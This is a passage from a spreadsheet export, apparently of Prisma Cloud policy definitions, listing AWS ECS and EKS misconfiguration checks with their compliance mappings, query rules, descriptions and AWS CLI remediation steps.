          <t>config from cloud.resource where api.name = 'aws-ecs-service' AND json.rule = launchType equals EC2 as X; config from cloud.resource where api.name = 'aws-ecs-cluster' AND json.rule = status equals ACTIVE and registeredContainerInstancesCount equals 0 as Y; filter '$.X.clusterArn equals $.Y.clusterArn'; show Y;</t>
        </is>
      </c>
      <c r="AA1867" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1867" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1867" t="inlineStr">
        <is>
          <t>PC-AWS-ECS-716</t>
        </is>
      </c>
      <c r="AD1867" t="b">
        <v>1</v>
      </c>
      <c r="AE1867" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1867" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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7" t="inlineStr">
        <is>
          <t>d657f5f1-6055-44b6-8f7d-15f011e90c18</t>
        </is>
      </c>
      <c r="AI1867" t="inlineStr">
        <is>
          <t>ffaade89-8bb8-4ced-8b75-52ec072b0b7d</t>
        </is>
      </c>
      <c r="AJ1867" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1867" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1868">
      <c r="A1868" t="inlineStr">
        <is>
          <t>Telecommunications Security Act - TSA, ITSG-33, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, Insurance Regulatory And Development Authority Of India, SOC 2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B1868" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1868" s="2" t="inlineStr"/>
      <c r="D1868" t="inlineStr"/>
      <c r="E1868" t="inlineStr"/>
      <c r="F1868" t="inlineStr"/>
      <c r="G1868" t="b">
        <v>1</v>
      </c>
      <c r="H18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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1868" t="inlineStr">
        <is>
          <t>aws-ecs</t>
        </is>
      </c>
      <c r="K1868" t="inlineStr">
        <is>
          <t>AWS ECS services have automatic public IP address assignment enabled</t>
        </is>
      </c>
      <c r="L1868" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1868" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1868" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1868" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1868" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1868" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R1868" t="inlineStr">
        <is>
          <t>SC-05-00 : Denial-of-service Protection</t>
        </is>
      </c>
      <c r="S1868" t="inlineStr"/>
      <c r="T1868" t="b">
        <v>0</v>
      </c>
      <c r="U1868" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1868" t="inlineStr">
        <is>
          <t>aws-ecs-service</t>
        </is>
      </c>
      <c r="W1868" t="inlineStr">
        <is>
          <t>This policy identifies whether Amazon ECS services are configured to assign public IP addresses automatically. Assigning public IP addresses to ECS services may expose them to the internet. If the services are not adequately secured or have vulnerabilities, they could be susceptible to unauthorized access, DDoS attacks, or other malicious activities. It is recommended that the Amazon ECS environment not have an associated public IP address except for limited edge cases.</t>
        </is>
      </c>
      <c r="X1868" t="inlineStr">
        <is>
          <t>To modify a disable auto-assign public IP for an ECS Service:
1. Use the AWS CLI console or AWS API, as you cannot update network configurations for an ECS Service using the AWS Management Console.
2. Run update-service command in AWS CLI to disable auto-assign public IP for an ECS Service
 aws ecs update-service --cluster &lt;ECS Cluster Name&gt; --service &lt;ECS Service Name&gt; --network-configuration "awsvpcConfiguration={subnets=[string, string],securityGroups=[string, string],assignPublicIp=DISABLED}"
Please Refer to the below URL:
https://docs.aws.amazon.com/cli/latest/reference/ecs/update-service.html 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-333
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-333</t>
        </is>
      </c>
      <c r="Y1868" t="inlineStr"/>
      <c r="Z1868" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ecs-service' AND json.rule = networkConfiguration.awsvpcConfiguration.assignPublicIp exists and networkConfiguration.awsvpcConfiguration.assignPublicIp equal ignore case "ENABLED"
{"category":"Logging","resourceTypes":["aws_ecs_service"]}</t>
        </is>
      </c>
      <c r="AA1868" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1868" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1868" t="inlineStr">
        <is>
          <t>PC-AWS-ECS-1064-CKV_AWS_333</t>
        </is>
      </c>
      <c r="AD1868" t="b">
        <v>1</v>
      </c>
      <c r="AE1868" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1868" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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8" t="inlineStr">
        <is>
          <t>7947cd09-5ad5-4520-bd95-d9327219bb55</t>
        </is>
      </c>
      <c r="AI1868" t="inlineStr">
        <is>
          <t>2e58c953-9a4e-4e59-bf3a-3ac93f4cd27b</t>
        </is>
      </c>
      <c r="AJ1868" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1868" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1869">
      <c r="A1869" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1869" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C1869" s="2" t="inlineStr"/>
      <c r="D1869" t="n">
        <v>0</v>
      </c>
      <c r="E1869" t="n">
        <v>8</v>
      </c>
      <c r="F1869" t="n">
        <v>0</v>
      </c>
      <c r="G1869" t="b">
        <v>1</v>
      </c>
      <c r="H18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69" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1869" t="inlineStr">
        <is>
          <t>aws-eks</t>
        </is>
      </c>
      <c r="K1869" t="inlineStr">
        <is>
          <t>AWS EKS - 7 Days - No Owner (v2)</t>
        </is>
      </c>
      <c r="L1869" t="inlineStr"/>
      <c r="M1869" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1869" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1869" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1869" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1869" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1869" t="inlineStr">
        <is>
          <t>5.1.3 Config - Compute Resource with No Owner</t>
        </is>
      </c>
      <c r="S1869" t="inlineStr"/>
      <c r="T1869" t="b">
        <v>0</v>
      </c>
      <c r="U1869" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1869" t="inlineStr">
        <is>
          <t>aws-eks-describe-cluster</t>
        </is>
      </c>
      <c r="W1869" t="inlineStr"/>
      <c r="X1869" t="inlineStr"/>
      <c r="Y1869" t="inlineStr"/>
      <c r="Z1869" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-eks-describe-cluster' AND resource.status = Active AND json.rule = "_DateTime.ageInDays(createdAt) &gt; 7 and tags[*].key does not contain owner" addcolumn _DateTime.ageInDays(createdAt)</t>
        </is>
      </c>
      <c r="AA1869" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1869" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1869" t="inlineStr"/>
      <c r="AD1869" t="b">
        <v>0</v>
      </c>
      <c r="AE1869" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1869" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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69" t="inlineStr">
        <is>
          <t>99d09013-63c2-44b9-9b5d-76f3159d7b1a</t>
        </is>
      </c>
      <c r="AI1869" t="inlineStr">
        <is>
          <t>4e8e7255-a16d-4b49-9e0b-e74830ab4db9</t>
        </is>
      </c>
      <c r="AJ1869" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1869" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1870">
      <c r="A1870" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1870" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1870" s="2" t="inlineStr"/>
      <c r="D1870" t="inlineStr"/>
      <c r="E1870" t="inlineStr"/>
      <c r="F1870" t="inlineStr"/>
      <c r="G1870" t="b">
        <v>1</v>
      </c>
      <c r="H18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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1870" t="inlineStr">
        <is>
          <t>aws-eks</t>
        </is>
      </c>
      <c r="K1870" t="inlineStr">
        <is>
          <t>AWS EKS - 45 Days - Owned (v2)</t>
        </is>
      </c>
      <c r="L1870" t="inlineStr"/>
      <c r="M1870" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1870" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1870" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1870" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1870" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1870" t="inlineStr">
        <is>
          <t>5.1.2 Config - Stale Compute Resources</t>
        </is>
      </c>
      <c r="S1870" t="inlineStr"/>
      <c r="T1870" t="b">
        <v>0</v>
      </c>
      <c r="U1870" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1870" t="inlineStr">
        <is>
          <t>aws-eks-describe-cluster</t>
        </is>
      </c>
      <c r="W1870" t="inlineStr"/>
      <c r="X1870" t="inlineStr"/>
      <c r="Y1870" t="inlineStr"/>
      <c r="Z1870" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-eks-describe-cluster' AND resource.status = Active AND json.rule = "_DateTime.ageInDays(createdAt) &gt; 45 and tags[*].key contains owner" addcolumn _DateTime.ageInDays(createdAt)</t>
        </is>
      </c>
      <c r="AA1870" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1870" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1870" t="inlineStr"/>
      <c r="AD1870" t="b">
        <v>0</v>
      </c>
      <c r="AE1870" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1870" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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0" t="inlineStr">
        <is>
          <t>c52627eb-39f2-4754-b8e4-ed96270c21c6</t>
        </is>
      </c>
      <c r="AI1870" t="inlineStr">
        <is>
          <t>4b1db03c-e111-4b46-9cdc-9e3da1564215</t>
        </is>
      </c>
      <c r="AJ1870" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1870" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1871">
      <c r="A1871" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1871" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C1871" s="2" t="inlineStr"/>
      <c r="D1871" t="n">
        <v>9</v>
      </c>
      <c r="E1871" t="n">
        <v>13</v>
      </c>
      <c r="F1871" t="n">
        <v>0</v>
      </c>
      <c r="G1871" t="b">
        <v>1</v>
      </c>
      <c r="H1871"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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1871" t="inlineStr">
        <is>
          <t>aws-eks</t>
        </is>
      </c>
      <c r="K1871" t="inlineStr">
        <is>
          <t>AWS EKS - 3 Days - No Owner (v3)</t>
        </is>
      </c>
      <c r="L1871" t="inlineStr"/>
      <c r="M1871" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1871" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1871" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1871" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1871" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1871" t="inlineStr">
        <is>
          <t>5.1.3 Config - Compute Resource with No Owner</t>
        </is>
      </c>
      <c r="S1871" t="inlineStr"/>
      <c r="T1871" t="b">
        <v>0</v>
      </c>
      <c r="U1871" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1871" t="inlineStr">
        <is>
          <t>aws-eks-describe-cluster</t>
        </is>
      </c>
      <c r="W1871" t="inlineStr">
        <is>
          <t>AWS- for EKS2s - find instances older than 7 days that do NOT have an "owner" tag</t>
        </is>
      </c>
      <c r="X1871" t="inlineStr"/>
      <c r="Y1871" t="inlineStr"/>
      <c r="Z1871" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-eks-describe-cluster' AND resource.status = Active AND json.rule = "_DateTime.ageInDays(createdAt) &gt; 3 and tags[*].key does not contain owner and tags[*].key does not contain Owner" addcolumn _DateTime.ageInDays(createdAt)</t>
        </is>
      </c>
      <c r="AA1871" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1871" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1871" t="inlineStr"/>
      <c r="AD1871" t="b">
        <v>0</v>
      </c>
      <c r="AE1871" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1871" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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1" t="inlineStr">
        <is>
          <t>ca7f29b4-8707-4c98-bc94-ff4b418af292</t>
        </is>
      </c>
      <c r="AI1871" t="inlineStr">
        <is>
          <t>db176631-9f4b-457d-ae82-e7a53d70bb02</t>
        </is>
      </c>
      <c r="AJ1871" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1871" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1872">
      <c r="A1872" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, ISO 27002:2022, MLPS 2.0, RBI Baseline Cyber Security and Resilience Requirements, HITRUST v.9.4.2 [Deprecated], RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, NIST SP 800-172, ISO/IEC 27017:2015, NIST CSF v2.0, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO/IEC 27017:2015, ISO/IEC 27017:2015, PCI DSS v3.2.1, NIST CSF, CIS Controls v7.1, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Copy of CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v1.2.1, ISO/IEC 27002:2013, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27017:2015, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27001:2022, ISO/IEC 27002:2013, MLPS 2.0 (Level 3), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, ISO 27002:2022, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST SP 800-171 Revision 2, FFIEC, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1872" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1872" s="2" t="inlineStr"/>
      <c r="D1872" t="inlineStr"/>
      <c r="E1872" t="inlineStr"/>
      <c r="F1872" t="inlineStr"/>
      <c r="G1872" t="b">
        <v>1</v>
      </c>
      <c r="H18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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1872" t="inlineStr">
        <is>
          <t>aws-eks</t>
        </is>
      </c>
      <c r="K1872" t="inlineStr">
        <is>
          <t>AWS EKS cluster control plane assigned multiple security groups</t>
        </is>
      </c>
      <c r="L1872" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1872" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1872" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1872" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1872" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1872" t="inlineStr">
        <is>
          <t>CIS Control 3</t>
        </is>
      </c>
      <c r="R1872" t="inlineStr">
        <is>
          <t>3.3</t>
        </is>
      </c>
      <c r="S1872" t="inlineStr"/>
      <c r="T1872" t="b">
        <v>0</v>
      </c>
      <c r="U1872" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1872" t="inlineStr">
        <is>
          <t>aws-eks-describe-cluster</t>
        </is>
      </c>
      <c r="W1872" t="inlineStr">
        <is>
          <t>Amazon EKS strongly recommends that you use a dedicated security group for each cluster control plane (one per cluster). This policy checks the number of security groups assigned to your cluster's control plane and alerts if there are more than one.</t>
        </is>
      </c>
      <c r="X1872" t="inlineStr">
        <is>
          <t>Create a single dedicated VPC security group for your EKS cluster control plane.
From the AWS console a security group cannot be added to, nor removed from, a Kubernetes cluster once it is created. To resolve this alert, create a new cluster with a single dedicated security group as per your requirements, then migrate all required cluster data from the reported cluster to this newly created cluster and delete the reported Kubernetes cluster.
1. Open the Amazon EKS dashboard.
2. Choose Create cluster.
3. On the Create cluster page, fill in the following fields:
- Cluster name
- Kubernetes version
- Role name
- VPC
- Subnets
- Security Groups - Choose your new dedicated control plane security group.
- Endpoint private access
- Endpoint public access
- Logging
4. Choose Create.</t>
        </is>
      </c>
      <c r="Y1872" t="inlineStr"/>
      <c r="Z1872" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-eks-describe-cluster' AND json.rule =  resourcesVpcConfig.securityGroupIds[*] size greater than 1</t>
        </is>
      </c>
      <c r="AA1872" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1872" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1872" t="inlineStr">
        <is>
          <t>PC-AWS-EKS-383</t>
        </is>
      </c>
      <c r="AD1872" t="b">
        <v>1</v>
      </c>
      <c r="AE1872" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1872" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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2" t="inlineStr">
        <is>
          <t>0fb6d35d-224f-4854-a279-8840068569a0</t>
        </is>
      </c>
      <c r="AI1872" t="inlineStr">
        <is>
          <t>0a1fb3c5-36a4-4d1d-83a9-cfd773e7e361</t>
        </is>
      </c>
      <c r="AJ1872" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1872" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1873">
      <c r="A1873" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, PCI DSS v4.0, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MLPS 2.0, HIPAA, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, PCI DSS v4.0, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Copy of ACSC Information Security Manual (ISM)-clone, MITRE ATT&amp;CK v8.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v10.0 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, NIST 800-53 Rev4, HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 2, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v12, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, NIST 800-53 Rev 5, CyberSecurity Law of the People's Republic of China, PCI DSS v4.0, Telecommunications Security Act - TSA, SOC 2, Matt's ATT&amp;ACK, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-171 Revision 3, jneytchev-fedramp-low, Insurance Regulatory And Development Authority Of India, PCI DSS v4.0, MLPS 2.0 (Level 2), Risk Management in Technology (RMiT), CIS Controls v8, CyberSecurity Law of the People's Republic of China, MITRE ATT&amp;CK v6.3 [Deprecated], SOC 2, kfirdaus AWS Account-CS, ISO/IEC 27001:2022, PCI DSS v4.0, MLPS 2.0 (Level 3), Secure Controls Framework (SCF) - 2024.2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Sarbanes Oxley Act (SOX), PCI DSS v4.0, APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, CyberSecurity Law of the People's Republic of China, Secure Controls Framework (SCF) - 2022.2.1, Australian Energy Sector Cyber Security Framework (AESCSF), CHC HITRUST CSF v.9.6.0, HITRUST v.9.4.2 [Deprecated], PIPEDA, ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, Fedramp (Low), kashan ACSC Information Security Manual (ISM), CIS Controls v8.1, MAS TRM 2021, CCPA 2018, ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, HIPAA, HIPAA, PCI DSS v4.0, Fedramp (Moderate), HITRUST CSF v.9.6.0, PCI DSS v3.2.1, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B1873" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1873" s="2" t="inlineStr"/>
      <c r="D1873" t="inlineStr"/>
      <c r="E1873" t="inlineStr"/>
      <c r="F1873" t="inlineStr"/>
      <c r="G1873" t="b">
        <v>1</v>
      </c>
      <c r="H18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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1873" t="inlineStr">
        <is>
          <t>aws-eks</t>
        </is>
      </c>
      <c r="K1873" t="inlineStr">
        <is>
          <t>AWS EKS cluster endpoint access publicly enabled</t>
        </is>
      </c>
      <c r="L1873" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1873" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1873" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1873" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1873" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1873" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1873" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S1873" t="inlineStr"/>
      <c r="T1873" t="b">
        <v>1</v>
      </c>
      <c r="U1873" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1873" t="inlineStr">
        <is>
          <t>aws-eks-describe-cluster</t>
        </is>
      </c>
      <c r="W1873" t="inlineStr">
        <is>
          <t>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This policy checks your Kubernetes cluster endpoint access and triggers an alert if publicly enabled.</t>
        </is>
      </c>
      <c r="X1873" t="inlineStr">
        <is>
          <t>Enable private access to the Kubernetes API server so that all communication between your worker nodes and the API server stays within your VPC. Disable public access to your API server so that it's not accessible from the internet.
1. Login to AWS Console
2. Navigate to the Amazon EKS dashboard
3. Choose the name of the cluster to display your cluster information
4. Under Networking, choose 'Manage networking'
5. Select 'Private' radio button
6. Click on 'Save changes' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-kubernetes-policies/bc-aws-kubernetes-2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-kubernetes-policies/bc-aws-kubernetes-2</t>
        </is>
      </c>
      <c r="Y1873" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'eks:UpdateClusterConfig' permission. Successful execution will disable public access for the respective EKS cluster and set private access.",
'impact': 'Disable automatic public IP assignment for the respective Subnet',
'cliScriptTemplate': 'aws eks update-cluster-config --name $resourceName --region $region --resources-vpc-config endpointPublicAccess=false,endpointPrivateAccess=true'</t>
        </is>
      </c>
      <c r="Z1873" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-eks-describe-cluster' AND json.rule =  resourcesVpcConfig.endpointPublicAccess is true or resourcesVpcConfig.endpointPrivateAccess is false
{"category":"Kubernetes","resourceTypes":["aws_eks_cluster"]}</t>
        </is>
      </c>
      <c r="AA1873" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1873" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1873" t="inlineStr">
        <is>
          <t>PC-AWS-EKS-380-CKV_AWS_39</t>
        </is>
      </c>
      <c r="AD1873" t="b">
        <v>1</v>
      </c>
      <c r="AE1873" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1873" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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3" t="inlineStr">
        <is>
          <t>9cd45e64-7469-4ce6-b5cf-60729a7263bb</t>
        </is>
      </c>
      <c r="AI1873" t="inlineStr">
        <is>
          <t>4b508cb7-9a42-4ad2-a2e3-ed3921e00015</t>
        </is>
      </c>
      <c r="AJ1873" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1873" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1874">
      <c r="A1874" t="inlineStr">
        <is>
